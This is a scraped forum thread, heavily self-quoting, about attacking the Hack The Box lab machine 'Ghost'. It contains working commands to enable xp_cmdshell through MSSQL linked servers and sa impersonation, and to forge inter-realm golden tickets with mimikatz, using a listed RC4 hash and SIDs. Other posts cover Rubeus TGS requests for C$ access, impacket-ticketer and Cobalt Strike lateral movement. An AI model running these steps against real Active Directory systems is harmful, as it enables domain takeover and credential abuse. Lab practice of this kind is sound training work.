[myhem]

If someone stuck with mssql, in thread missed 2 things:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > REGONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"

In the impacket-mssqlclient utility after the 'exec_as_login sa' step use the enable_xp_cmdshell command .. it executes the same 4 lines EXEC sp_configure , RECONFIGURE etc.,

No, I was getting "let administrator enable xp_cmdshell" message after it, so need to enable it manually.
UPD. oh you mean "enable_xp_cmdshell", got it

what is the next after getting shell as mssqlserver

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB

[bmoon10]

I've got a hint for two different approaches, I haven't managed to exploit them, but I'll leave them here for someone smarter than me:
- In order to forge the golden ticket, the aes256 key must be used, the nt hash won't work
- Unconstrained delegation

I don't have more info, only that.

with mimikatz golden ticket can be obtained using ghost$ rc4 hash and corp.ghost.htb and ghost.htb sids.

Yeah, I know, but every ticket returns the error (both, nthash and aeskey)

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Looking for a possible cause, maybe this is related? https://github.com/fortra/impacket/issues/1601 

When using NTLM hash of KRBTGT and Impacket's ticketer, you will need the "-user-id" flag.
Example:
impacket-ticketer -nthash $HASH -domain-sid $DOMAIN SID -domain $DOMAIN -user-id $IDofUSER $NameOfUser
To get the user-id, you just need to use Mimikatz or others like WMIC ("wmic useraccount where name='joe' get sid")

That is because Windows from the update KB5008380 got a new PAC structure and a new check: KDC now checks if the user actually exists with the right RID. So now you need to make a ticket for an existing user with right RID with the flag -user-id as earlesshoichi mentioned before.

I'll try with an existing user

Not sure from where you are getting the ghost$ rc4 hash, i've used the ghost$ rc4 hash from the meterpreter hashdump command for getting the golden ticket (with mimikatz for tgt and Rubeus.exe for tgs and it worked)

[jsvensson]

I've got a hint for two different approaches, I haven't managed to exploit them, but I'll leave them here for someone smarter than me:
- In order to forge the golden ticket, the aes256 key must be used, the nt hash won't work
- Unconstrained delegation

I don't have more info, only that.

with mimikatz golden ticket can be obtained using ghost$ rc4 hash and corp.ghost.htb and ghost.htb sids.

Yeah, I know, but every ticket returns the error (both, nthash and aeskey)

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Looking for a possible cause, maybe this is related? https://github.com/fortra/impacket/issues/1601 

When using NTLM hash of KRBTGT and Impacket's ticketer, you will need the "-user-id" flag.
Example:
impacket-ticketer -nthash $HASH -domain-sid $DOMAIN SID -domain $DOMAIN -user-id $IDofUSER $NameOfUser
To get the user-id, you just need to use Mimikatz or others like WMIC ("wmic useraccount where name='joe' get sid")

That is because Windows from the update KB5008380 got a new PAC structure and a new check: KDC now checks if the user actually exists with the right RID. So now you need to make a ticket for an existing user with right RID with the flag -user-id as earlesshoichi mentioned before.

I'll try with an existing user

Not sure from where you are getting the ghost$ rc4 hash, i've used the ghost$ rc4 hash from the meterpreter hashdump command for getting the golden ticket (with mimikatz for tgt and Rubeus.exe for tgs and it worked)

Yep it worked, I could read user.txt and root.txt. But how to get to dc01 with shell? i tryied psexec but it fails.

[bmoon10]

I've got a hint for two different approaches, I haven't managed to exploit them, but I'll leave them here for someone smarter than me:
- In order to forge the golden ticket, the aes256 key must be used, the nt hash won't work
- Unconstrained delegation

I don't have more info, only that.

with mimikatz golden ticket can be obtained using ghost$ rc4 hash and corp.ghost.htb and ghost.htb sids.

Yeah, I know, but every ticket returns the error (both, nthash and aeskey)

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Looking for a possible cause, maybe this is related? https://github.com/fortra/impacket/issues/1601 

When using NTLM hash of KRBTGT and Impacket's ticketer, you will need the "-user-id" flag.
Example:
impacket-ticketer -nthash $HASH -domain-sid $DOMAIN SID -domain $DOMAIN -user-id $IDofUSER $NameOfUser
To get the user-id, you just need to use Mimikatz or others like WMIC ("wmic useraccount where name='joe' get sid")

That is because Windows from the update KB5008380 got a new PAC structure and a new check: KDC now checks if the user actually exists with the right RID. So now you need to make a ticket for an existing user with right RID with the flag -user-id as earlesshoichi mentioned before.

I'll try with an existing user

Not sure from where you are getting the ghost$ rc4 hash, i've used the ghost$ rc4 hash from the meterpreter hashdump command for getting the golden ticket (with mimikatz for tgt and Rubeus.exe for tgs and it worked)

OK ... with this way or is something wrong?

/mimikatz "Kerberos::golden /user:Administrator /domain:corp.ghost.htb /sid:...498  /sids:...966 /rc4:..297 /service:krbtgt /target:ghost.htb /ticket:C:\temp\trust.kirbi" "exit"

./Rubeus.exe asktgs /ticket:trust.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt

966 SID seems to be different in my case. otherwise commands look perfect.

[osamy7593]

In 10.0.0.10


kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi

.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap

dir \\DC01.ghost.htb\C$

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[bmoon10]

In 10.0.0.10


kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi

.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap

dir \\DC01.ghost.htb\C$

Not sure if this is the intended way to get the flags especially for a insane box. 
seems kind of easy compared to mist, corporate - insane boxes

[myhem]

In 10.0.0.10


kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi

.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap

dir \\DC01.ghost.htb\C$

im still getting error, could you please tell which commands you used?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB

[bmoon10]

In 10.0.0.10


kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi

.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap

dir \\DC01.ghost.htb\C$

im still getting error, could you please tell which commands you used?

dir \\DC01.ghost.htb\C$  returns access denied if there are issues in the tickets.
if both tgt, tgs works properly you won't face issues with the dir command.

[mazafaka555]

I've got a hint for two different approaches, I haven't managed to exploit them, but I'll leave them here for someone smarter than me:
- In order to forge the golden ticket, the aes256 key must be used, the nt hash won't work
- Unconstrained delegation

I don't have more info, only that.

with mimikatz golden ticket can be obtained using ghost$ rc4 hash and corp.ghost.htb and ghost.htb sids.

Yeah, I know, but every ticket returns the error (both, nthash and aeskey)

[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Looking for a possible cause, maybe this is related? https://github.com/fortra/impacket/issues/1601 

When using NTLM hash of KRBTGT and Impacket's ticketer, you will need the "-user-id" flag.
Example:
impacket-ticketer -nthash $HASH -domain-sid $DOMAIN SID -domain $DOMAIN -user-id $IDofUSER $NameOfUser
To get the user-id, you just need to use Mimikatz or others like WMIC ("wmic useraccount where name='joe' get sid")

That is because Windows from the update KB5008380 got a new PAC structure and a new check: KDC now checks if the user actually exists with the right RID. So now you need to make a ticket for an existing user with right RID with the flag -user-id as earlesshoichi mentioned before.

I'll try with an existing user

Not sure from where you are getting the ghost$ rc4 hash, i've used the ghost$ rc4 hash from the meterpreter hashdump command for getting the golden ticket (with mimikatz for tgt and Rubeus.exe for tgs and it worked)

Yep it worked, I could read user.txt and root.txt. But how to get to dc01 with shell? i tryied psexec but it fails.

One of the usual possibilities with Cobal Strike -- once you got full access to the dc, you may upload  your payload via smb and spawn it remotely to get access to the DC.

https://www.youtube.com/watch?v=dDAz13wmCk8
https://www.youtube.com/watch?v=GI-vvX_OBd4
https://www.youtube.com/watch?v=QuU_u-yu8Lc

[bmoon10]

In 10.0.0.10


kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi

.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap

dir \\DC01.ghost.htb\C$

Not sure if this is the intended way to get the flags especially for a insane box. 
seems kind of easy compared to mist, corporate - insane boxes

I thinks this is the unintended way, the intended should be related with ADFS account and justin.bradley

The concept of exploiting the bidirectional trust as such is an another AD vulnerability.
Technically corp.ghost.htb getting full access to ghost.htb seems right in this case.
only issue is the access to dc01 shell (though it might be irrelevant ?)